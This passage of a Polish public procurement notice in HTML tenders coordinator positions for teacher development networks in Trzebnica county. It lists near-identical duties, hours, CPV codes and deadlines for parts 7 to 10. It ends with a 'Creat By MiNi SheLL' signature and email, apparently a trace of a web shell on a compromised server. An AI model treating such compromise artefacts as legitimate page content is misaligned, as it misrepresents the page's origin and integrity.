-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7. Koordynator nr IV ds. sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola (w roku szkolnym 2014/2015)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.50.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część 8. Koordynator nr V sieci: Praca z nowoczesnymi technologiami (w roku szkolnym 2014/2015)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.52.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część 9. Koordynator nr VI ds. sieci: Jak rozwijać twórcze myślnie uczniów (w roku szkolnym 2014/2015)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.52.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część 10. Koordynator nr VII ds. sieci: Jak wspierać dziecko w uczeniu matematyki (w roku szkolnym 2014/2015)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6.	Koordynator ds. sieci i doskonalenia
a)	Szacunkowa ilość godzin dla każdego koordynatora: 40 godzin lekcyjnych w projekcie.
b)	W ramach jednej sieci współpracować ze sobą będzie do 20 nauczycieli z różnych szkół i przedszkoli z terenu powiatu trzebnickiego, tj. w sumie ok. 100 nauczycieli. Uczestnicy sieci będą spotykać się przeciętnie 5 razy po 4 godziny lekcyjne w trakcie trwania projektu w ramach jednej sieci (co około 2 miesiące). Między spotkaniami nauczyciele będą pracować na platformie internetowej udostępnionej przez Ośrodek Rozwoju Edukacji. 
c)	W ramach projektu planuje się powołanie 6 sieci:
1)	1 sieć dla dyrektorów (w ramach 2 grup po 13 osób); rekrutacja do sieci: każdy dyrektor/wicedyrektor będzie uczestniczyć w sieci dla dyrektorów i wytypuje min. 1 nauczyciela do pracy w sieci problemowej i / lub tematycznej. 
2)	5 sieci przedmiotowo-problemowych - każda po ok. 20 uczestników (łącznie ok. 100 nauczycieli). 
d)	W roku szkolnym 2013/2014 obędą się 3 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola),
-2 sieci przedmiotowo-problemowe (tematy sieci: 1. Doświadczenie i eksperymenty na zajęciach z przedmiotów przyrodniczych, 2. Nauczyciele pracują zespołowo).
e)	W roku szkolnym 2014/2015 odbędą się 4 sieci:
-1 grupa sieci dla dyrektorów (temat sieci: Rola dyrektora w promocji i budowaniu wizerunku szkoły/przedszkola), 
-3 sieci przedmiotowo-problemowe (tematy sieci: 1. Praca z nowoczesnymi technologiami, 2. Jak rozwijać twórcze myślnie uczniów, 3. Jak wspierać dziecko w uczeniu matematyki).
f)	Koordynator przygotuje sprawozdanie z realizacji rocznego planu pracy w ramach sieci, zawierającego relację z przebiegu spotkań oraz wypracowanych rezultatów i zamieści je na platformie internetowej oraz na stronie www projektu. Współpraca będzie odbywać się również za pomocą forów wymiany doświadczeń, których moderatorem będzie koordynator.
g)	Obowiązki koordynatora ds. sieci i doskonalenia:
1)	przygotowanie planu działania sieci współpracy i samokształcenia zgodnego z potrzebami zgłoszonymi przez uczestników, harmonogramu pracy sieci;
2)	prowadzenie sieci zgodnie z wytycznymi Poradnika metodycznego dla koordynatorów sieci współpracy i samokształcenia (wyd. ORE, Kraków 2012);
3)	organizowanie i prowadzenie spotkań uczestników sieci w Powiatowym Ośrodku Doradztwa Metodyczno-Programowego w Trzebnicy oraz w Starostwie Powiatowym w Trzebnicy;
4)	wnioskowanie o pozyskanie ekspertów zewnętrznych  - specjalistów w zakresie tematu pracy sieci (jeśli zajdzie taka potrzeba);
5)	bieżące moderowanie sieci, w tym forum dyskusyjnego oraz wymiany doświadczeń dla uczestników (praca na platformie internetowej Ośrodka Rozwoju Edukacji);
6)	zamieszczanie na platformie internetowej materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieć;
7)	sporządzenie rocznego sprawozdania z pracy sieci;
8)	promocja działań sieci;
9)	prowadzenie bieżącej dokumentacji związanej z realizacją sieci;
10)	ścisła współpraca z Asystentem koordynatora ds. sieci i doskonalenia oraz pozostałymi członkami Zespołu projektowego,
11)	współpraca z Powiatowym Ośrodkiem Doradztwa Metodyczno-Programowego w Trzebnicy;
12)	oznaczanie wszystkich dokumentów związanych z projektem logotypami POKL, UE, Europejskiego Funduszu Społecznego i Powiatu Trzebnickiego (herb).
7.	W przypadku realizacji zadań przez Wykonawcę w innym projekcie w ramach Narodowych Strategicznych Ram Odniesienia Zamawiający wymaga, aby obciążenie wynikające z powyższego nie wykluczało możliwości prawidłowej i efektywnej realizacji wszystkich zadań powierzonych w ramach przedmiotu zamówienia a łączne zaangażowanie w realizację zadań powierzonych w ramach przedmiotu zamówienia nie przekraczało 240 godzin miesięcznie (na potwierdzenie powyższego wymaga się podpisania stosownego oświadczenia na etapie podpisania umowy na realizację zadania).
8.	Ze względu na szczególną specyfikę przedmiotu zamówienia oraz koniczność optymalnego wykorzystania potencjału wykonawcy nie jest możliwe łącznie funkcji SORE z funkcjami koordynatorów. Wykonawca składający ofertę na kilka części postępowaniach nie może zgłosić tej samej osoby do pełnienia więcej niż jednej z powyższych funkcji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.52.00.00-9, 80.52.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com